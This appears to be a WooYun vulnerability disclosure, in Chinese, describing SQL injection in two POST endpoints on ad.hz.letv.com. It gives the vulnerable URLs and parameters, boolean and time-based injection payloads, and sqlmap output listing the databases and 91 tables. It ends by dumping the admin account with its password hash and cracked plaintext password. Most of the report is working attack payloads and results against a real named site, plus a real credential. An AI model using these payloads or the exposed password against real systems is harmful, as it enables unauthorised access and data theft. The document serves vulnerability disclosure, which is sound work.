WooYun.org

post请求：
http://ad.hz.letv.com/benzc-class/php/jieda_list.php
参数：
province=1
http://ad.hz.letv.com/benzc-class/php/jieda_list.php
province=1' or '1'='2
返回空
province=1' or '1'='1
返回所有数据
另一处：
post：
http://ad.hz.letv.com/benzc-class/php/jieda_data.php
参数：
jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8
参数mobile存在注入，or 1=1请求延迟，or 1=2请求不延迟
available databases [2]:
[*] ad
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -
---
web application technology: PHP 5.3.19
back-end DBMS: MySQL >= 5.0.0
Database: ad
[91 tables]
+-----------------------------+
| BAM_data |
| CAMRY_data |
| CAMRY_list |
| UserName_data |
| 'Dealer List$'_xlnm#Extract |
| Dealer List |
| a30_people |
| ad_car |
| ad_madinglin_shareNum |
| ad_page_pv_num |
| ad_record |
| ad_voteinfo |
| ad_voterecord |
| ad_wph_cmt |
| ad_wph_online_time |
| ad_wph_tel |
| add_jieqidata |
| audi_2015_list |
| audi_list |
| audi_list_bak |
| audi_list_bak1 |
| audi_list_bak2 |
| audi_list_bak3 |
| baolai_data |
| baolai_list |
| baoshan_user_data |
| baoshan_vip_card |
| baoshan_vip_week |
| benzc_data |
| benzc_list |
| changan_data |
| changan_list |
| createTab |
| diluerweimaData |
| fiesta_car |
| fiesta_list |
| fute_car |
| fute_ld |
| fute_list |
| game_kp_bianhao |
| game_kp_jpk |
| game_kp_user |
| game_yao_info |
| game_yao_jianhao |
| golf_contact |
| golf_data |
| golf_jialv_data |
| golf_jialv_list |
| golf_list |
| golf_people |
| hailan_data |
| hailan_list |
| highlander_data |
| highlander_list |
| hn_list |
| hn_record |
| infiniti_info |
| infiniti_user |
| jieda_data |
| jieda_data_bak_20150504 |
| jieda_list |
| jieda_list_yuan |
| jieda_list_yuan2 |
| jys50_yuyue |
| kadjar_data |
| kadjar_list |
| lingmu_data |
| lingmu_list |
| linmu_list_city |
| meten_phone |
| olay_record |
| olay_vote |
| op_admin_user |
| op_books |
| op_lottery_sys |
| op_signup |
| op_winner_list |
| sj_prize |
| sj_userlist |
| tp_tab |
| tp_tab_ip |
| tz18_jianId |
| tz18_user |
| vezel_contact |
| vezel_people |
| wph_yaoqinma |
| wutaigroup_cont |
| y_prize |
| y_users |
| yifu_list |
| yili |
+-----------------------------+
Table: op_admin_user
[1 entry]
+-----+----------+----------+--------------------------------------------+---------------+
| uid | username | realname | password | lastlogintime |
+-----+----------+----------+--------------------------------------------+---------------+
| 1 | admin | oppo | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536 |
+-----+----------+----------+--------------------------------------------+---------------+
管理员弱口令，打屁屁